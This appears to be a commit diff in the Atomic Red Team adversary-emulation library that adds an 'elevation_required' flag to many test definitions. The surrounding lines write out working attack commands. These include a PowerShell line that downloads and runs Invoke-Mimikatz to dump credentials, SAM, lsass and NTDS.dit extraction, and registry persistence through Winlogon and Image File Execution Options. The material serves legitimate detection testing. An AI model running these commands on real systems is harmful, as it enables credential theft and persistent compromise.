Add elevated (redcanaryco#542)

* provide elevation_required attribute

* provide elevation_required attribute

* provide elevation_required attribute

atomics/T1002/T1002.yaml

@@ -19,6 +19,7 @@ atomic_tests:
       default: C:\test\Data.zip
   executor:
     name: powershell
+    elevation_required: false
     command: |
       dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
 
@@ -38,6 +39,7 @@ atomic_tests:
       default: exfilthis.rar
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       rar a -r #{output_file} #{input_file}
 
@@ -58,6 +60,7 @@ atomic_tests:
       default: /tmp/victim-files.zip
   executor:
     name: sh
+    elevation_required: false
     command: |
       zip #{output_file} #{input_files}
 
@@ -74,6 +77,7 @@ atomic_tests:
       default: /tmp/victim-gzip.txt
   executor:
     name: sh
+    elevation_required: false
     command: |
       gzip -f #{input_file}
 
@@ -94,5 +98,6 @@ atomic_tests:
       default: /tmp/victim-files.tar.gz
   executor:
     name: sh
+    elevation_required: false
     command: |
       tar -cvzf #{output_file} #{input_file_folder}

atomics/T1003/T1003.yaml

@@ -15,6 +15,7 @@ atomic_tests:
       default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
   executor:
     name: powershell
+    elevation_required: true
     command: |
       IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
 
@@ -25,6 +26,7 @@ atomic_tests:
     - windows
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       gsecdump -a
 
@@ -40,6 +42,7 @@ atomic_tests:
       default: output.txt
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       wce -o #{output_file}
 
@@ -51,6 +54,7 @@ atomic_tests:
     - windows
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       reg save HKLM\sam sam
       reg save HKLM\system system
@@ -68,6 +72,7 @@ atomic_tests:
       type: Path
       default: lsass_dump.dmp
   executor:
+    elevation_required: true
     name: command_prompt
     command: |
       procdump.exe -accepteula -ma lsass.exe #{output_file}
@@ -130,6 +135,7 @@ atomic_tests:
       default: C:\Atomic_Red_Team
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
 
@@ -145,6 +151,7 @@ atomic_tests:
       default: "C:"
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       vssadmin.exe create shadow /for=#{drive_letter}
 
@@ -168,6 +175,7 @@ atomic_tests:
       default: C:\Extract
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
       copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE

atomics/T1004/T1004.yaml

@@ -18,6 +18,7 @@ atomic_tests:
 
   executor:
     name: powershell
+    elevation_required: false
     command: |
       Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
 
@@ -36,6 +37,7 @@ atomic_tests:
 
   executor:
     name: powershell
+    elevation_required: false
     command: |
       Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
 
@@ -54,6 +56,7 @@ atomic_tests:
 
   executor:
     name: powershell
+    elevation_required: false
     command: |
       New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
       Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force

atomics/T1005/T1005.yaml

@@ -18,6 +18,7 @@ atomic_tests:
 
   executor:
     name: sh
+    elevation_required: false
     command: |
       cd ~/Library/Cookies
       grep -q "#{search_string}" "Cookies.binarycookies"

atomics/T1007/T1007.yaml

@@ -18,6 +18,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       tasklist.exe
       sc query
@@ -38,5 +39,6 @@ atomic_tests:
       default: C:\Windows\Temp\service-list.txt
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       net.exe start >> #{output_file}

atomics/T1009/T1009.yaml

@@ -17,5 +17,6 @@ atomic_tests:
       default: /tmp/evil-binary
   executor:
     name: sh
+    elevation_required: false
     command: |
       dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}

atomics/T1010/T1010.yaml

@@ -22,6 +22,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
       #{output_file_name}

atomics/T1012/T1012.yaml

@@ -23,6 +23,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
       reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

atomics/T1015/T1015.yaml

@@ -17,6 +17,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 
@@ -34,6 +35,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 
@@ -51,6 +53,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 
@@ -68,6 +71,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 
@@ -85,6 +89,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 
@@ -102,6 +107,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
 
@@ -119,5 +125,6 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

atomics/T1016/T1016.yaml

@@ -12,6 +12,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       ipconfig /all
       netsh interface show
@@ -29,6 +30,7 @@ atomic_tests:
 
   executor:
     name: sh
+    elevation_required: false
     command: |
       arp -a
       netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c

atomics/T1018/T1018.yaml

@@ -12,6 +12,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       net view /domain
       net view
@@ -25,6 +26,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
 
@@ -37,6 +39,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       arp -a
 
@@ -50,6 +53,7 @@ atomic_tests:
 
   executor:
     name: sh
+    elevation_required: false
     command: |
       arp -a | grep -v '^?'
 
@@ -63,5 +67,6 @@ atomic_tests:
 
   executor:
     name: sh
+    elevation_required: false
     command: |
       for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done

atomics/T1022/T1022.yaml

@@ -14,6 +14,7 @@ atomic_tests:
 
   executor:
     name: sh
+    elevation_required: false
     command: |
       echo "This file will be encrypted" > /tmp/victim-gpg.txt
       mkdir /tmp/victim-files
@@ -32,6 +33,7 @@ atomic_tests:
     - windows
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       mkdir ./tmp/victim-files
       cd ./tmp/victim-files
@@ -47,6 +49,7 @@ atomic_tests:
     - windows
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       path=%path%;"C:\Program Files (x86)\winzip"
       mkdir ./tmp/victim-files
@@ -62,6 +65,7 @@ atomic_tests:
     - windows
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       mkdir ./tmp/victim-files
       cd ./tmp/victim-files

atomics/T1027/T1027.yaml

@@ -13,6 +13,7 @@ atomic_tests:
 
   executor:
     name: sh
+    elevation_required: false
     command: |
       sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
       cat /tmp/encoded.dat | base64 -d > /tmp/art.sh

atomics/T1028/T1028.yaml

@@ -12,6 +12,7 @@ atomic_tests:
 
   executor:
     name: powershell
+    elevation_required: true
     command: |
       Enable-PSRemoting -Force
 

atomics/T1030/T1030.yaml

@@ -15,6 +15,7 @@ atomic_tests:
 
   executor:
     name: sh
+    elevation_required: false
     command: |
       cd /tmp/
       dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1

atomics/T1031/T1031.yaml

@@ -13,6 +13,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
       sc start Fax

atomics/T1033/T1033.yaml

@@ -18,6 +18,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       cmd.exe /C whoami
       wmic useraccount get /ALL
@@ -38,6 +39,7 @@ atomic_tests:
 
   executor:
     name: sh
+    elevation_required: false
     command: |
       users
       w

atomics/T1035/T1035.yaml

@@ -23,6 +23,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: true
     command: |
       sc.exe create #{service_name} binPath= #{executable_command}
       sc.exe start #{service_name}

atomics/T1036/T1036.yaml

@@ -12,6 +12,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
       cmd.exe /c %SystemRoot%\Temp\lsass.exe
@@ -25,6 +26,7 @@ atomic_tests:
 
   executor:
     name: sh
+    elevation_required: false
     command: |
       cp /bin/sh /tmp/crond
       /tmp/crond

atomics/T1037/T1037.yaml

@@ -18,6 +18,7 @@ atomic_tests:
 
   executor:
     name: command_prompt
+    elevation_required: false
     command: |
       REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}"